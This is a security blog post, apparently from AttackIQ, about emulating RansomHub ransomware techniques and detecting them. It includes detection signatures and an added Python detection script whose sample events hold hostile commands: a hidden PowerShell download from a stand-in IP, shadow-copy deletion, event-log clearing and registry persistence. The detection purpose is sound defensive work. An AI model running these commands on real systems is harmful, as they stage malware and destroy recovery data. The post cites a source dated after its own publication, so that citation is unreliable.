Emulating the Relentless RansomHub Ransomware
2025-3-6 17:48:35 Author: securityboulevard.com

RansomHub is a Ransomware-as-a-Service (RaaS) operation that emerged in early 2024, targeting organizations worldwide. Like many ransomware families, it follows a double-extortion model, encrypting victims’ data while also stealing sensitive information to pressure them into paying a ransom. The encryptor is developed using either C++ or Go, with multiple versions designed to target various systems, including Windows, Linux, and ESXi servers. A distinctive characteristic of RansomHub is that its binary requires a password to execute and encrypt files, making sample analysis more challenging for researchers.


There are notable similarities between RansomHub and Knight ransomware encryptors. Moreover, RansomHub emerged around the same time that Knight’s source code was offered for sale on the dark web and its leak site became inaccessible, suggesting it may be a successor to Knight ransomware. Additionally, there are links to BlackCat/ALPHV operations as well, indicating possible ties to previous ransomware groups.

AttackIQ previously emulated RansomHub ransomware with an emulation released on September 5, 2024, in response to CISA Advisory AA24-242A. This emulation has since been updated to incorporate newly observed behaviors associated with RansomHub ransomware.

AttackIQ has released a new attack graph composed of several Tactics, Techniques and Procedures (TTPs) exhibited by RansomHub ransomware during its most recent activities to help customers validate their security controls and their ability to defend against this sophisticated threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new attack graph in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against baseline behaviors associated with RansomHub ransomware.
  • Assess their security posture against a ransomware family targeting organizations worldwide.
  • Continuously validate detection and prevention pipelines against a playbook similar to those used by currently active ransomware groups.

[Malware Emulation] RansomHub – 2025-01 – Associated Tactics, Techniques and Procedures (TTPs)

This emulation replicates the sequence of behaviors associated with the deployment of RansomHub ransomware on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.

This emulation is based on Trend Micro’s report released on December 20, 2025, and supported by the technical analysis published by Arete in January 2025.

Initial Access & Persistence – Ransomware Deployment and Establishing Persistence

This stage begins with the deployment of RansomHub ransomware. Initially, it attempts to escalate privileges by listing active access tokens. Next, it establishes persistence through registry run keys and enables automatic login for an administrative account. Finally, it allows remote symbolic links to point to local resources.

Ingress Tool Transfer (T1105): Two separate scenarios cover this technique, one that downloads the sample to memory and one that saves it to disk, to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Access Token Manipulation (T1134): This scenario lists active access tokens that could be impersonated by another process. This method is commonly used to escalate privileges.

Boot or Logon Autostart Execution: Registry Run Keys (T1547.001): This scenario acquires persistence by setting the HKLM\Software\Microsoft\Windows\CurrentVersion\Run registry key that Windows uses to identify what applications should be run at system startup.

Modify Registry (T1112): This scenario modifies the AutoAdminLogon registry value under the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon to enable automatic login with an administrative account.

Impair Defenses: Disable or Modify Tools (T1562.001): This scenario executes the fsutil command to enable the Remote to Local (R2L) and Remote to Remote (R2R) symbolic link evaluation policies, which allow malware to follow shortcuts that point to remote paths.

Discovery – Local System Reconnaissance

This stage focuses on system information and account discovery. It collects extensive details about the system, including running processes and services, user accounts, environmental variables, physical drives and volume information.

System Information Discovery (T1082): This scenario calls the GetSystemInfo Windows native API call to retrieve system information. This can be used to detect sandboxes, create unique identifiers, and adjust execution behaviors.

System Information Discovery (T1082): This scenario executes the GetComputerNameExW Windows native API call to retrieve a NetBIOS or DNS name associated with the local computer.

System Information Discovery (T1082): This scenario executes the NtQuerySystemInformation Windows native API call to identify security controls or other software running on the system.

System Information Discovery (T1082): This scenario executes the GetEnvironmentStrings Windows native API call to discover environmental variables, usually used to fingerprint the system or search for stored passwords and secrets.

Account Discovery: Local Account (T1087.001): This scenario executes the NetUserEnum Windows native API call to enumerate user accounts on the system.

Process Discovery (T1057): This scenario executes the CreateToolhelp32Snapshot Windows native API call to obtain a snapshot of running processes and iterates through each process entry with Process32FirstW and Process32NextW.

System Service Discovery (T1007): This scenario executes the EnumServicesStatus Windows native API call to gather critical information about configured services on a compromised system, such as service name, service display name, and current service status.

Peripheral Device Discovery (T1120): This scenario executes the GetLogicalDriveStringsW Windows native API call to retrieve information about the system’s physical drives.

System Information Discovery (T1082): This scenario executes the GetVolumeInformationA Windows native API call for each drive letter to retrieve the volume name, serial number, and file system type.

System Information Discovery (T1082): This scenario calls the GetVolumeNameForVolumeMountPointA Windows native API function for each drive letter to retrieve the volume GUID path.

Network Share Discovery (T1135): This scenario executes the NetShareEnum Windows native API call to enumerate network shares from the local computer.

Impact – RansomHub File Encryption

This stage begins with the enumeration and systematic traversal of the file system. Next, it encrypts files using a combination of Curve25519 and AES. Finally, it clears Windows event logs and deletes volume shadow copies using Windows Management Instrumentation (WMI) objects.

File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows native API calls to enumerate the file system.

Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by RansomHub ransomware.

Indicator Removal: Clear Windows Event Logs (T1070.001): The scenario will use the wevtutil.exe binary to clear event logs from the system.

Inhibit System Recovery (T1490): This scenario executes the Get-WMIObject Win32_ShadowCopy PowerShell command to delete a recent Volume Shadow Copy created by the assessment template.

Detection and Mitigation Opportunities

With so many different techniques being used by threat actors, it can be difficult to know which to prioritize for prevention and detection assessment. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily on downloading additional stages of malware. Endpoint and network security controls should both be employed to detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

2. Inhibit System Recovery (T1490):

Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.

2a. Detection

Detecting the deletion of Volume Shadow Copies is usually the first step, and it can be done by examining command-line activity:

Process Name == powershell.exe
Command Line == "Get-WmiObject Win32_ShadowCopy | ForEach-Object ($_.Delete();)"
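As an added example, not AttackIQ's code or part of the original post, the following Python implements the two detection signatures above (1a and 2a) together with checks for the other behaviors the emulation describes: the Run key persistence, the AutoAdminLogon value and the fsutil SymlinkEvaluation change from the first stage, and the wevtutil event log clearing from the Impact stage. It runs the rules over constructed Sysmon-style records (event 1 = process creation, event 13 = registry value set). Every record, image path, the 203.0.113.5 address and the value names are constructed sample data, not indicators taken from the reports.

```python
"""Added example (not AttackIQ's code or from the original post): detection
logic for RansomHub behaviours named on this page, run over constructed
Sysmon-style telemetry. Event 1 = process creation, event 13 = registry
value set. Every record, path and address below is constructed sample data."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int            # 1 = process create, 13 = registry value set
    image: str = ""          # full path of the process image (event 1)
    command_line: str = ""   # process command line (event 1)
    target_object: str = ""  # registry value path (event 13)
    details: str = ""        # registry value data (event 13)


def image_name(e: Event) -> str:
    """Basename of the image path, lower-cased, e.g. 'powershell.exe'."""
    return e.image.rsplit("\\", 1)[-1].lower()


def rule_ingress_tool_transfer(e: Event) -> bool:
    """1a: cmd/powershell with (IWR | Invoke-WebRequest) AND DownloadData AND Hidden."""
    if e.event_id != 1 or image_name(e) not in {"cmd.exe", "powershell.exe"}:
        return False
    cl = e.command_line.lower()
    return (re.search(r"\biwr\b", cl) is not None or "invoke-webrequest" in cl) \
        and "downloaddata" in cl and "hidden" in cl


def rule_shadow_copy_delete(e: Event) -> bool:
    """2a: PowerShell enumerating Win32_ShadowCopy and invoking Delete()."""
    cl = e.command_line.lower()
    return e.event_id == 1 and image_name(e) == "powershell.exe" \
        and "win32_shadowcopy" in cl and ".delete(" in cl


def rule_event_log_clear(e: Event) -> bool:
    """T1070.001: wevtutil clearing a log (cl / clear-log)."""
    return e.event_id == 1 and image_name(e) == "wevtutil.exe" \
        and re.search(r"\b(cl|clear-log)\b", e.command_line.lower()) is not None


def rule_symlink_evaluation(e: Event) -> bool:
    """T1562.001: fsutil enabling remote-to-local / remote-to-remote symlinks."""
    cl = e.command_line.lower()
    return e.event_id == 1 and image_name(e) == "fsutil.exe" \
        and "symlinkevaluation" in cl and ("r2l:1" in cl or "r2r:1" in cl)


def rule_run_key(e: Event) -> bool:
    """T1547.001: a value written under HKLM\\...\\CurrentVersion\\Run."""
    return e.event_id == 13 and re.search(
        r"^hklm\\.*\\microsoft\\windows\\currentversion\\run\\[^\\]+$",
        e.target_object.lower()) is not None


def rule_autoadminlogon(e: Event) -> bool:
    """T1112: Winlogon\\AutoAdminLogon set to 1 (REG_SZ "1" or DWORD 1)."""
    t = e.target_object.lower()
    return e.event_id == 13 \
        and re.search(r"\\windows ?nt\\currentversion\\winlogon\\autoadminlogon$", t) is not None \
        and re.fullmatch(r"1|dword \(0x0*1\)", e.details.strip().lower()) is not None


RULES = [
    ("T1105", rule_ingress_tool_transfer),
    ("T1490", rule_shadow_copy_delete),
    ("T1070.001", rule_event_log_clear),
    ("T1562.001", rule_symlink_evaluation),
    ("T1547.001", rule_run_key),
    ("T1112", rule_autoadminlogon),
]


def evaluate(events):
    """Return (technique_id, event_index) for every rule that fires, in event order."""
    return [(tid, i) for i, e in enumerate(events) for tid, rule in RULES if rule(e)]


# Constructed sample telemetry: benign activity mixed with RansomHub-like behaviour.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # 0: benign administrative PowerShell, should not fire
    Event(1, PS, 'powershell.exe -Command "Get-Process | Select-Object Name"'),
    # 1: hidden-window download (matches the 1a signature)
    Event(1, PS, "powershell.exe -WindowStyle Hidden -Command \"$b=(New-Object Net.WebClient)"
                 ".DownloadData('http://203.0.113.5/stage2'); IWR http://203.0.113.5/beacon\""),
    # 2: shadow copy deletion via WMI (matches the 2a signature)
    Event(1, PS, 'powershell.exe -Command "Get-WmiObject Win32_ShadowCopy | ForEach-Object {$_.Delete();}"'),
    # 3: event log clearing
    Event(1, r"C:\Windows\System32\wevtutil.exe", "wevtutil.exe cl Security"),
    # 4: remote symlink evaluation enabled
    Event(1, r"C:\Windows\System32\fsutil.exe", "fsutil.exe behavior set SymlinkEvaluation R2L:1 R2R:1"),
    # 5: Run key persistence (constructed value name and path)
    Event(13, target_object=r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
          details=r"C:\Users\Public\svc.exe"),
    # 6: automatic logon enabled
    Event(13, target_object=r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoAdminLogon",
          details="1"),
    # 7: benign registry write, should not fire
    Event(13, target_object=r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
          details="DWORD (0x00000001)"),
]

if __name__ == "__main__":
    for tid, idx in evaluate(SAMPLE_EVENTS):
        print(f"{tid:10} event[{idx}]")
```

The rules are deliberately narrow mirrors of the signatures on this page; in production they would sit alongside broader logic (RunOnce and HKCU Run keys, vssadmin and wbadmin variants of shadow copy deletion, ETW-based API telemetry for the discovery stage), and the Sysmon field names would come from the real event schema rather than this simplified record.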

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery.

Wrap Up

In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by RansomHub ransomware operators. With data generated from continuous testing and the use of this attack graph, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Proactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.


Source: https://securityboulevard.com/2025/03/emulating-the-relentless-ransomhub-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=emulating-the-relentless-ransomhub-ransomware